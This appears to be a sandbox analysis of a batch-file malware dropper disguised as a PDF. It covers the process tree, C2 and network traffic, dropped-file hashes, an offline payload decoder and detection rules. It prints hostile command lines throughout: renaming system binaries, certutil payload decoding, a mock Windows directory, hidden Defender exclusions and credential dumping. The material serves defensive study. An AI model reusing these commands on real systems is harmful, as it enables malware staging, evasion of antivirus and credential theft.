PID 3676 wrote to memory of 1668 | N/A | C:\Users\Public\alpha.exe | C:\Users\Public\kn.exe
PID 3676 wrote to memory of 1668 | N/A | C:\Users\Public\alpha.exe | C:\Users\Public\kn.exe
PID 5044 wrote to memory of 2364 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\Libraries\AHA.COM
PID 5044 wrote to memory of 2364 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\Libraries\AHA.COM
PID 5044 wrote to memory of 2364 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\Libraries\AHA.COM
PID 5044 wrote to memory of 4796 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 5044 wrote to memory of 4796 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 5044 wrote to memory of 2784 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 5044 wrote to memory of 2784 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2364 wrote to memory of 4684 | N/A | C:\Users\Public\Libraries\AHA.COM | C:\Windows\SysWOW64\cmd.exe
PID 2364 wrote to memory of 4684 | N/A | C:\Users\Public\Libraries\AHA.COM | C:\Windows\SysWOW64\cmd.exe
PID 2364 wrote to memory of 4684 | N/A | C:\Users\Public\Libraries\AHA.COM | C:\Windows\SysWOW64\cmd.exe
PID 4684 wrote to memory of 1984 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\esentutl.exe
PID 4684 wrote to memory of 1984 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\esentutl.exe
PID 4684 wrote to memory of 1984 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\esentutl.exe
PID 4684 wrote to memory of 1964 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\esentutl.exe
PID 4684 wrote to memory of 1964 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\esentutl.exe
PID 4684 wrote to memory of 1964 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\esentutl.exe
PID 4684 wrote to memory of 3128 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Public\alpha.pif
PID 4684 wrote to memory of 3128 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Public\alpha.pif
PID 4684 wrote to memory of 3128 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Public\alpha.pif
PID 4684 wrote to memory of 1064 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Public\alpha.pif
PID 4684 wrote to memory of 1064 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Public\alpha.pif
PID 4684 wrote to memory of 1064 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Public\alpha.pif
PID 4684 wrote to memory of 4440 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Public\alpha.pif
PID 4684 wrote to memory of 4440 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Public\alpha.pif
PID 4684 wrote to memory of 4440 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Public\alpha.pif
PID 4440 wrote to memory of 3956 | N/A | C:\Users\Public\alpha.pif | C:\Users\Public\xpha.pif
PID 4440 wrote to memory of 3956 | N/A | C:\Users\Public\alpha.pif | C:\Users\Public\xpha.pif
PID 4440 wrote to memory of 3956 | N/A | C:\Users\Public\alpha.pif | C:\Users\Public\xpha.pif
PID 4684 wrote to memory of 1672 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows \SysWOW64\per.exe
PID 4684 wrote to memory of 1672 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows \SysWOW64\per.exe
PID 1672 wrote to memory of 3624 | N/A | C:\Windows \SysWOW64\per.exe | C:\Windows\SYSTEM32\esentutl.exe
PID 1672 wrote to memory of 3624 | N/A | C:\Windows \SysWOW64\per.exe | C:\Windows\SYSTEM32\esentutl.exe
PID 1672 wrote to memory of 2236 | N/A | C:\Windows \SysWOW64\per.exe | C:\Users\Public\pha.pif
PID 1672 wrote to memory of 2236 | N/A | C:\Windows \SysWOW64\per.exe | C:\Users\Public\pha.pif
PID 4684 wrote to memory of 232 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Public\alpha.pif
PID 4684 wrote to memory of 232 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Public\alpha.pif
PID 4684 wrote to memory of 232 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Public\alpha.pif
PID 4684 wrote to memory of 1844 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Public\alpha.pif
PID 4684 wrote to memory of 1844 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Public\alpha.pif
PID 4684 wrote to memory of 1844 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Public\alpha.pif
PID 4684 wrote to memory of 5056 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Public\alpha.pif
PID 4684 wrote to memory of 5056 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Public\alpha.pif
PID 4684 wrote to memory of 5056 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Public\alpha.pif
PID 2364 wrote to memory of 744 | N/A | C:\Users\Public\Libraries\AHA.COM | C:\Windows\SysWOW64\esentutl.exe
PID 2364 wrote to memory of 744 | N/A | C:\Users\Public\Libraries\AHA.COM | C:\Windows\SysWOW64\esentutl.exe
PID 2364 wrote to memory of 744 | N/A | C:\Users\Public\Libraries\AHA.COM | C:\Windows\SysWOW64\esentutl.exe
PID 2364 wrote to memory of 1660 | N/A | C:\Users\Public\Libraries\AHA.COM | C:\Windows\SysWOW64\SndVol.exe
PID 2364 wrote to memory of 1660 | N/A | C:\Users\Public\Libraries\AHA.COM | C:\Windows\SysWOW64\SndVol.exe
PID 2364 wrote to memory of 1660 | N/A | C:\Users\Public\Libraries\AHA.COM | C:\Windows\SysWOW64\SndVol.exe
PID 2364 wrote to memory of 1660 | N/A | C:\Users\Public\Libraries\AHA.COM | C:\Windows\SysWOW64\SndVol.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PAYMENT TRANSFER ERROR.PDF.bat"

C:\Windows\System32\extrac32.exe

C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe

C:\Windows\system32\extrac32.exe

extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\PAYMENT TRANSFER ERROR.PDF.bat" "C:\\Users\\Public\\AHA.GIF" 3

C:\Users\Public\kn.exe

C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\PAYMENT TRANSFER ERROR.PDF.bat" "C:\\Users\\Public\\AHA.GIF" 3

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AHA.GIF" "C:\\Users\\Public\\Libraries\\AHA.COM" 10

C:\Users\Public\kn.exe

C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AHA.GIF" "C:\\Users\\Public\\Libraries\\AHA.COM" 10

C:\Users\Public\Libraries\AHA.COM

C:\Users\Public\Libraries\AHA.COM

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AHA.GIF" / A / F / Q / S

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\jkzjblcW.cmd" "

C:\Windows\SysWOW64\esentutl.exe

C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o

C:\Windows\SysWOW64\esentutl.exe

C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o

C:\Users\Public\alpha.pif

C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "

C:\Users\Public\alpha.pif

C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"

C:\Users\Public\alpha.pif

C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10

C:\Users\Public\xpha.pif

C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10

C:\Windows \SysWOW64\per.exe

"C:\\Windows \\SysWOW64\\per.exe

C:\Windows\SYSTEM32\esentutl.exe

esentutl /y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe /d C:\\Users\\Public\\pha.pif /o

C:\Users\Public\pha.pif

C:\\Users\\Public\\pha.pif -WindowStyle hidden -Command Add-MpPreference -ExclusionExtension '.exe','bat','.pif'

C:\Users\Public\alpha.pif

C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"

C:\Users\Public\alpha.pif

C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64

C:\Users\Public\alpha.pif

C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"

C:\Windows\SysWOW64\esentutl.exe

C:\\Windows\\System32\\esentutl.exe /y C:\Users\Public\Libraries\AHA.COM /d C:\\Users\\Public\\Libraries\\Wclbjzkj.PIF /o

C:\Windows\SysWOW64\SndVol.exe

C:\Windows\System32\SndVol.exe

C:\Windows\SysWOW64\SndVol.exe

C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\emiy"

C:\Windows\SysWOW64\SndVol.exe

C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\emiy"

C:\Windows\SysWOW64\SndVol.exe

C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\emiy"

C:\Windows\SysWOW64\SndVol.exe

C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\ppnitxd"

C:\Windows\SysWOW64\SndVol.exe

C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\ppnitxd"

C:\Windows\SysWOW64\SndVol.exe

C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\rjtbupnzxe"
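The two `kn -decodehex` invocations above are worth reading closely: `kn.exe` is the copy of certutil.exe that `extrac32` made, and the trailing numeric argument is the CryptStringToBinary format type, so the chain is "pull a base64 block out of the .bat itself (type 3, base64 between NEW CERTIFICATE REQUEST headers) into AHA.GIF, then decode that as an addressed hex dump (type 10) into AHA.COM", which the report tags as the ModiLoader second stage. Everything before the BEGIN marker is the batch script that cmd.exe actually runs, which is how one file is both a working .bat and a carrier. The following is an added example, not code from the report or the malware: it emulates both certutil stages in Python so an analyst can recover the dropped files offline without executing the sample. The batch text it decodes is constructed for the demo and does not reproduce the real payload.

```python
"""
Added example, not part of the sandbox report: emulate the two
`certutil -decodehex` stages in the process list so the dropped files can
be recovered from the .bat offline, without running the batch file.

The trailing number on `certutil -decodehex InFile OutFile <type>` is the
CryptStringToBinary format type:
  3  = CRYPT_STRING_BASE64REQUESTHEADER: base64 between
       "-----BEGIN NEW CERTIFICATE REQUEST-----" / "-----END ... -----"
  10 = CRYPT_STRING_HEXADDR: hex bytes preceded by an offset column
The sample batch text built below is constructed for this demo and does not
reproduce the real payload; the parsers follow the documented layouts.
"""
import base64
import re
from typing import Tuple

BEGIN = "-----BEGIN NEW CERTIFICATE REQUEST-----"
END = "-----END NEW CERTIFICATE REQUEST-----"


def decode_base64requestheader(text: str) -> bytes:
    """Stage 1 (type 3): take the base64 body between the request-header
    markers. Everything before BEGIN (the visible batch commands) is ignored,
    which is why the payload can ride inside a working .bat file."""
    m = re.search(re.escape(BEGIN) + r"(.*?)" + re.escape(END), text, re.S)
    if not m:
        raise ValueError("no NEW CERTIFICATE REQUEST block in input")
    body = re.sub(r"\s+", "", m.group(1))
    return base64.b64decode(body, validate=True)


def decode_hexaddr(text: str) -> bytes:
    """Stage 2 (type 10): each line is '<offset>\\t<hex bytes ...>'; drop the
    offset token and parse the remaining two-character hex tokens."""
    out = bytearray()
    for line in text.splitlines():
        tokens = line.split()
        if not tokens:
            continue
        for tok in tokens[1:]:
            if len(tok) != 2:
                raise ValueError(f"unexpected HEXADDR token {tok!r}")
            out.append(int(tok, 16))
    return bytes(out)


def unpack_from_bat(bat_text: str) -> Tuple[bytes, bytes]:
    """Run both stages: .bat -> AHA.GIF (base64-decoded hex dump) -> AHA.COM."""
    stage1 = decode_base64requestheader(bat_text)
    stage2 = decode_hexaddr(stage1.decode("ascii"))
    return stage1, stage2


def encode_hexaddr(data: bytes) -> str:
    """Produce HEXADDR-style text; used only to construct the sample input."""
    rows = [f"{off:04x}\t" + " ".join(f"{b:02x}" for b in data[off:off + 16])
            for off in range(0, len(data), 16)]
    return "\r\n".join(rows) + "\r\n"


# Constructed stand-in for the embedded executable: a DOS header prefix only.
SAMPLE_PAYLOAD = b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00\xb8\x00\x00\x00"


def build_sample_bat() -> str:
    """Constructed stand-in for PAYMENT TRANSFER ERROR.PDF.bat: a couple of the
    batch lines from the report, then the blob the renamed certutil decodes."""
    blob = base64.b64encode(encode_hexaddr(SAMPLE_PAYLOAD).encode("ascii")).decode("ascii")
    wrapped = "\r\n".join(blob[i:i + 64] for i in range(0, len(blob), 64))
    return (
        "@echo off\r\n"
        'extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"\r\n'
        "rem remaining commands omitted from this constructed sample\r\n"
        f"{BEGIN}\r\n{wrapped}\r\n{END}\r\n"
    )


if __name__ == "__main__":
    gif, com = unpack_from_bat(build_sample_bat())
    print(f"stage1 {len(gif)} bytes -> stage2 {len(com)} bytes, starts with {com[:2]!r}")
```

On the real sample, feed the .bat's bytes to `unpack_from_bat` and compare the SHA256 of the two results against the AHA.GIF and AHA.COM hashes in the Files section; a mismatch means the blob layout differs from the documented one (for example an ASCII column, which is type 11, not 10) and the parser needs adjusting rather than the hashes.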

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 240.143.123.92.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 2007.filemail.com udp
DE 50.7.84.74:443 2007.filemail.com tcp
DE 50.7.84.74:443 2007.filemail.com tcp
US 8.8.8.8:53 74.84.7.50.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
N/A 127.0.0.1:59089 tcp
US 8.8.8.8:53 legacyrem.duckdns.org udp
MY 103.186.116.130:59089 legacyrem.duckdns.org tcp
US 8.8.8.8:53 130.116.186.103.in-addr.arpa udp
MY 103.186.116.130:59089 legacyrem.duckdns.org tcp
US 8.8.8.8:53 geoplugin.net udp
NL 178.237.33.50:80 geoplugin.net tcp
US 8.8.8.8:53 50.33.237.178.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 25.140.123.92.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp

Files

C:\Users\Public\alpha.exe

MD5 8a2122e8162dbef04694b9c3e0b6cdee
SHA1 f1efb0fddc156e4c61c5f78a54700e4e7984d55d
SHA256 b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450
SHA512 99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

C:\Users\Public\kn.exe

MD5 bd8d9943a9b1def98eb83e0fa48796c2
SHA1 70e89852f023ab7cde0173eda1208dbb580f1e4f
SHA256 8de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2
SHA512 95630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b

C:\Users\Public\AHA.GIF

MD5 2ddfa3ebd56847d40e59f092be0e6568
SHA1 3e56b1a986cd5600bc8dd134f1ff2ce5dbd53827
SHA256 11693a473afe426024135c37b1013491c2e98d89e6c9da6edfcc0a8c28bf1d02
SHA512 92816361505672a82452ed2036120a3d45e6abfa52577db819ba56318109da5242428bdf521751d6832976bc63831ddbaf0c10ad6563d26ed7b177f276421652

C:\Users\Public\Libraries\AHA.COM

MD5 d70fa5471771d18888f0861ac060a914
SHA1 83ef28ef9e4850629433f497fd0360120449e297
SHA256 31a7e70deb8af07d7b76b5dea8cbf90ec63bea24bffdd5ebac6f223c02f55753
SHA512 af89922e5a24a12522603e4a034b2e1aef911d5cf6399de426aa95b971dcf70513a99f45033895939f0475d7b001054717c9b0d38278ff45ee2b41376f3da31b

memory/2364-28-0x0000000002920000-0x0000000003920000-memory.dmp

memory/2364-29-0x0000000002920000-0x0000000003920000-memory.dmp

memory/2364-31-0x0000000000400000-0x0000000000540000-memory.dmp

C:\Users\Public\Libraries\jkzjblcW.cmd

MD5 b87f096cbc25570329e2bb59fee57580
SHA1 d281d1bf37b4fb46f90973afc65eece3908532b2
SHA256 d08ccc9b1e3acc205fe754bad8416964e9711815e9ceed5e6af73d8e9035ec9e
SHA512 72901adde38f50cf6d74743c0a546c0fea8b1cd4a18449048a0758a7593a176fc33aad1ebfd955775eefc2b30532bcc18e4f2964b3731b668dd87d94405951f7

memory/1984-38-0x0000000000970000-0x0000000000980000-memory.dmp

memory/1984-61-0x0000000000D10000-0x0000000000D20000-memory.dmp

C:\Users\Public\alpha.pif

MD5 d0fce3afa6aa1d58ce9fa336cc2b675b
SHA1 4048488de6ba4bfef9edf103755519f1f762668f
SHA256 4d89fc34d5f0f9babd022271c585a9477bf41e834e46b991deaa0530fdb25e22
SHA512 80e127ef81752cd50f9ea2d662dc4d3bf8db8d29680e75fa5fc406ca22cafa5c4d89ef2eac65b486413d3cdd57a2c12a1cb75f65d1e312a717d262265736d1c2

C:\Users\Public\xpha.pif

MD5 b3624dd758ccecf93a1226cef252ca12
SHA1 fcf4dad8c4ad101504b1bf47cbbddbac36b558a7
SHA256 4aaa74f294c15aeb37ada8185d0dead58bd87276a01a814abc0c4b40545bf2ef
SHA512 c613d18511b00fa25fc7b1bdde10d96debb42a99b5aaab9e9826538d0e229085bb371f0197f6b1086c4f9c605f01e71287ffc5442f701a95d67c232a5f031838

C:\Windows \SysWOW64\per.exe

MD5 869640d0a3f838694ab4dfea9e2f544d
SHA1 bdc42b280446ba53624ff23f314aadb861566832
SHA256 0db4d3ffdb96d13cf3b427af8be66d985728c55ae254e4b67d287797e4c0b323
SHA512 6e775cfb350415434b18427d5ff79b930ed3b0b3fc3466bc195a796c95661d4696f2d662dd0e020c3a6c3419c2734468b1d7546712ecec868d2bbfd2bc2468a7

C:\Windows \SysWOW64\NETUTILS.dll

MD5 c5db31551cb21105e3f0b3e467b91cc7
SHA1 c66fd7732973d9803ba0fd4323e8507876892310
SHA256 3fa23d8f7b7eeac6443e107bd70d0c6371afc1f8082d3d58fffd8685cf9e2193
SHA512 6d1ee4b55fb74dc093f52caf1e093ec2742af263ff8fa264cd61eea48c021c3438150ba12a8e9d694e7246fe296ea011d8b6313e8ee4476a63c7072c2990685e

C:\Users\Public\pha.pif

MD5 04029e121a0cfa5991749937dd22a1d9
SHA1 f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA256 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA512 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

memory/2236-153-0x0000028AC5AC0000-0x0000028AC5AE2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kxe1h5lt.okm.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\emiy

MD5 faaa2b16df1bfc1a3792faaa35786349
SHA1 359534a59d7c5139ae205c24533ba60afdfb9f3f
SHA256 3586befc3b8b4da223e2ee0dcb00965ba5c0a205c14f2acefdeec7e46efddd5a
SHA512 2fbc79cace52a58e69ab983d034bb41ebb2496f767e18e5e4b31eefc4447c935d8614f744c71302e459350a05562fadc4c2355d76638b595e7cff1bb3d1618db

C:\ProgramData\remcos\logs.dat

MD5 e8ac82413558862717d0c2c86eb86ef1
SHA1 0dfb235814745e6cd6c3ead4fe2f4a4278086ec0
SHA256 0717378fe2be81cfb2641e32892fb02d41fb93945aae9f4df90f48e2d9005675
SHA512 fc3916fb21c72f397bac4c02d96ef67b67f75471bd2c9e62f7fc98803dc50199ea55fecb54435577e819d4abe8a4acfb6faa1c7774b2f5ad629909bcfb79cb2e
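Every stage in the process list above runs as a renamed or relocated system binary (cmd.exe as alpha.exe and alpha.pif, certutil.exe as kn.exe, ping.exe as xpha.pif, powershell.exe as pha.pif, and per.exe under a "C:\Windows \SysWOW64" directory whose trailing space makes it look like the real one), so detections keyed on the image name alone miss most of it. The rules below key on the argument patterns and on the paths in the Files section instead. This is an added example, not tooling from the report: the event records are constructed from the command lines shown above plus two benign decoys, and the `image`/`cmdline` fields are an assumed minimal schema rather than any particular EDR's.

```python
"""
Added example, not part of the sandbox report: detection logic for the
ModiLoader/DBatLoader staging pattern in the process list, applied to
process-creation events. Events are constructed for the demo from the command
lines in the report plus two benign decoys; the event fields (image, cmdline)
are an assumed minimal schema, not a particular EDR's.
"""
import re
from typing import Callable, Dict, List, Tuple

Event = Dict[str, str]


def normalize(s: str) -> str:
    # Lower-case and collapse repeated separators: the batch file writes
    # C:\\Windows\\System32 with doubled backslashes, which cmd accepts.
    return re.sub(r"\\+", r"\\", s.lower())


SYS = r"c:\\windows\\(?:system32|syswow64)\\"   # regex fragment, post-normalize()

RULES: List[Tuple[str, Callable[[Event], bool]]] = [
    # extrac32 /C /Y or esentutl /y ... /d ... /o copying a System32 binary under C:\Users
    ("lolbin_copy_system_binary", lambda e: bool(
        re.search(r"extrac32(?:\.exe)?\s+/c\s+/y\s+" + SYS + r"\S+\s+\"?c:\\users\\", e["cmdline"])
        or re.search(r"esentutl(?:\.exe)?\s+/y\s+" + SYS + r"\S+\s+/d\s+\"?c:\\users\\", e["cmdline"]))),
    # certutil -decodehex matched on the argument, not the image: the report runs it as kn.exe
    ("certutil_decodehex_any_image", lambda e: "-decodehex" in e["cmdline"]),
    # "C:\Windows \" (trailing space) mock trusted directory, in the mkdir or as a later image path
    ("mock_trusted_directory", lambda e: bool(
        re.search(r"c:\\windows\s+(?:\\|\")", e["image"] + " " + e["cmdline"]))),
    # legacy .pif/.com executables launched from C:\Users\Public (renamed cmd/ping/powershell copies)
    ("public_pif_or_com_image", lambda e: e["image"].startswith("c:\\users\\public\\")
        and e["image"].endswith((".pif", ".com"))),
    # Defender exclusion added from a renamed PowerShell
    ("defender_exclusion_added", lambda e: "add-mppreference" in e["cmdline"]
        and "-exclusion" in e["cmdline"]),
    # /stext passed to a system image that takes no such switch (hollowed host process)
    ("stext_credential_dump", lambda e: bool(re.search(r"\s/stext\s", e["cmdline"]))
        and e["image"].startswith("c:\\windows\\")),
]


def scan(events: List[Event]) -> Dict[int, List[str]]:
    """Return {event index: [rule names]} for events that trip at least one rule."""
    hits: Dict[int, List[str]] = {}
    for i, ev in enumerate(events):
        n = {k: normalize(v) for k, v in ev.items()}
        matched = [name for name, pred in RULES if pred(n)]
        if matched:
            hits[i] = matched
    return hits


# Constructed events: command lines taken from the report's process list, two benign decoys at the end.
SAMPLE_EVENTS: List[Event] = [
    {"image": r"C:\Windows\System32\extrac32.exe",
     "cmdline": r'C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"'},
    {"image": r"C:\Users\Public\kn.exe",
     "cmdline": r'C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\PAYMENT TRANSFER ERROR.PDF.bat" "C:\\Users\\Public\\AHA.GIF" 3'},
    {"image": r"C:\Windows\SysWOW64\esentutl.exe",
     "cmdline": r"C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o"},
    {"image": r"C:\Users\Public\alpha.pif",
     "cmdline": r'C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "'},
    {"image": r"C:\Windows \SysWOW64\per.exe", "cmdline": r'"C:\\Windows \\SysWOW64\\per.exe'},
    {"image": r"C:\Users\Public\pha.pif",
     "cmdline": r"C:\\Users\\Public\\pha.pif -WindowStyle hidden -Command Add-MpPreference -ExclusionExtension '.exe','bat','.pif'"},
    {"image": r"C:\Windows\SysWOW64\SndVol.exe",
     "cmdline": r'C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\emiy"'},
    {"image": r"C:\Windows\System32\certutil.exe", "cmdline": r"certutil -hashfile C:\Users\Admin\setup.exe SHA256"},
    {"image": r"C:\Windows\System32\PING.EXE", "cmdline": r"ping 127.0.0.1 -n 10"},
]


if __name__ == "__main__":
    for idx, names in scan(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(names)}  <- {SAMPLE_EVENTS[idx]['cmdline'][:60]}")
```

The two decoys matter: `certutil -hashfile` and a plain `ping 127.0.0.1 -n 10` are everyday activity, and the rules stay quiet on them because they look for the copy-then-decode arguments and the Public/.pif image path rather than for certutil or ping by name. The `ping` delay in the report only becomes suspicious because it is launched as `xpha.pif` from C:\Users\Public, which the image-path rule catches.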